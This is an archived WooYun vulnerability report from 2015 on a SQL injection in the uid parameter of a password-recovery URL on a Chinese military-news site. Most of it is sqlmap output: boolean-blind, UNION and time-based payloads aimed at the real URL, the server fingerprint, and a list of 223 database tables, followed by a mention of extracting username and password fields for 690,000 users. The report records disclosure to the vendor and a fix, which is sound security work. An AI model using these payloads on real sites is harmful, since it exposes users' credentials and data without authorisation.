乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-07: 厂商已经确认,细节仅向厂商公开 2015-08-17: 细节向核心白帽子及相关领域专家公开 2015-08-27: 细节向普通白帽子公开 2015-09-06: 细节向实习白帽子公开 2015-09-21: 细节向公众公开
http://www.chinaiiss.com/do.php?do=user&p1=getpass&uid=999900&id=83adSsKK6Y
这是找回密码的链接,uid参数存在注入
232张表:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: do=user&p1=getpass&uid=999900 AND 5432=5432&id=83adSsKK6Y Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: do=user&p1=getpass&uid=-5089 UNION ALL SELECT NULL,CONCAT(0x7166706d71,0x55567143416458485263,0x7162726671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&id=83adSsKK6Y Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: do=user&p1=getpass&uid=999900 AND SLEEP(5)&id=83adSsKK6Y---web application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.11Database: cis[223 tables]+-------------------------------+| forum_remark || iiss_admin || iiss_adminsession || iiss_admintype || iiss_answer || iiss_article || iiss_article_sendmail || iiss_article_special || iiss_article_specialfield || iiss_articlefield || iiss_articlemodify || iiss_articlerelated || iiss_attachment || iiss_banned || iiss_blogger_iprecord || iiss_blogger_vote || iiss_bottom || iiss_clickcount || iiss_clickinfo || iiss_clicklocation || iiss_clickrecord || iiss_conference || iiss_conference_author_praise || iiss_conference_candidate || iiss_conference_praise_record || iiss_conference_user_medal || iiss_contest || iiss_contest_question || iiss_contest_record || iiss_contest_userquestion || iiss_contest_userscore || iiss_country || iiss_country_area || iiss_datatype || iiss_day || iiss_defense_elite || iiss_delrecord || iiss_downimage || iiss_facecount || iiss_figure || iiss_figure_character || iiss_figure_impression || iiss_figure_year || iiss_file_attachment || iiss_guestbook || iiss_hero || iiss_hire || iiss_history_today || iiss_hours || iiss_image || iiss_image_comic || iiss_imagefield || iiss_index_accesslog || iiss_infocategory || iiss_infocomment || iiss_infomodel || iiss_jump || iiss_leader || iiss_links || iiss_links_record || iiss_linkscooper || iiss_linkstype || iiss_list_accesslog || iiss_livetelecast || iiss_livetelecast_article || iiss_member || iiss_member_failedlogins || iiss_member_field || iiss_member_recommend || iiss_member_verifycode || iiss_member_verifycode2 || iiss_milarea || iiss_milcontrast || iiss_milcountry || iiss_milcountryelse || iiss_mobile_apps || iiss_mobile_article || iiss_mobile_conference || iiss_mobile_image || iiss_mobile_manual || iiss_mobile_pk || iiss_mobile_version || iiss_mobile_wallpaper || iiss_navi || iiss_people || iiss_perspective || iiss_perspectivefield || iiss_pk || iiss_pkvote || iiss_pkvoteuser || iiss_promotion_iprecord || iiss_promotionlink || iiss_promotionstatistics || iiss_question || iiss_quick_member || iiss_review_record || iiss_session || iiss_sethome || iiss_spec_baodiaovote || iiss_spec_baodiaovotetotal || iiss_spec_nanhai || iiss_spec_qiongdingzhixia || iiss_spec_seekones || iiss_special || iiss_special_foruminfo || iiss_spiderpic || iiss_sysdata || iiss_table || iiss_tag || iiss_tagart || iiss_tagartspec || iiss_taghero || iiss_tagimg || iiss_tagperspective || iiss_tagsend || iiss_updatearticle || iiss_userquestion || iiss_viewrecord_201002 || iiss_viewrecord_201003 || iiss_viewrecord_201004 || iiss_viewrecord_201005 || iiss_viewrecord_201006 || iiss_viewrecord_201007 || iiss_viewrecord_201008 || iiss_viewrecord_201009 || iiss_viewrecord_201010 || iiss_viewrecord_201011 || iiss_viewrecord_201012 || iiss_viewrecord_201101 || iiss_viewrecord_201102 || iiss_viewrecord_201103 || iiss_viewrecord_201104 || iiss_viewrecord_201105 || iiss_viewrecord_201106 || iiss_viewrecord_201107 || iiss_viewrecord_201108 || iiss_viewrecord_201109 || iiss_viewrecord_201110 || iiss_viewrecord_201111 || iiss_viewrecord_201112 || iiss_viewrecord_201201 || iiss_viewrecord_201202 || iiss_viewrecord_201203 || iiss_viewrecord_201204 || iiss_viewrecord_201205 || iiss_viewrecord_201206 || iiss_viewrecord_201207 || iiss_viewrecord_201208 || iiss_viewrecord_201209 || iiss_viewrecord_201210 || iiss_viewrecord_201211 || iiss_viewrecord_201212 || iiss_viewrecord_201301 || iiss_viewrecord_201302 || iiss_viewrecord_201303 || iiss_viewrecord_201304 || iiss_viewrecord_201305 || iiss_viewrecord_201306 || iiss_viewrecord_201307 || iiss_viewrecord_201308 || iiss_viewrecord_201309 || iiss_viewrecord_201310 || iiss_viewrecord_201311 || iiss_viewrecord_201312 || iiss_viewrecord_201401 || iiss_viewrecord_201402 || iiss_viewrecord_201403 || iiss_viewrecord_201404 || iiss_viewrecord_201405 || iiss_viewrecord_201406 || iiss_viewrecord_201407 || iiss_viewrecord_201408 || iiss_viewrecord_201409 || iiss_viewrecord_201410 || iiss_viewrecord_201411 || iiss_viewrecord_201412 || iiss_viewrecord_201501 || iiss_viewrecord_201502 || iiss_viewrecord_201503 || iiss_viewrecord_201504 || iiss_viewrecord_201505 || iiss_viewrecord_201506 || iiss_viewrecord_201507 || iiss_viewrecord_201508 || iiss_viewrecord_day || iiss_viewrecord_daybysite || iiss_voice || iiss_voice_news || iiss_vote || iiss_votetype || iiss_voteuser || iiss_wap_article || iiss_wap_image || iiss_wap_pk || iiss_weaponspec || iiss_weibo_activeusers || iiss_weibo_friendships || iiss_weibo_repost || iiss_weibo_repostrecord || iiss_weibo_repostusers_record || iiss_weibo_tokenuser || iiss_weibo_users || iiss_wikipedia || iiss_wikipediaedition || iiss_wikipediafield || iiss_worship || iiss_writer || iiss_writerart || iiss_writerartfield || iiss_yearvoterecord || iissblog_album || iissblog_blog || iissblog_blog2 || iissblog_class || iissblog_comment || iissblog_favorites || iissblog_feed || iissblog_log || iissblog_pic || iissblog_pic_favorites || iissblog_user || iissblog_user_20140806 || iissblog_viewnum |+-------------------------------+
69万用户信息:
取用户名和密码字段来看看:
危害等级:高
漏洞Rank:15
确认时间:2015-08-07 17:58
已修复
暂无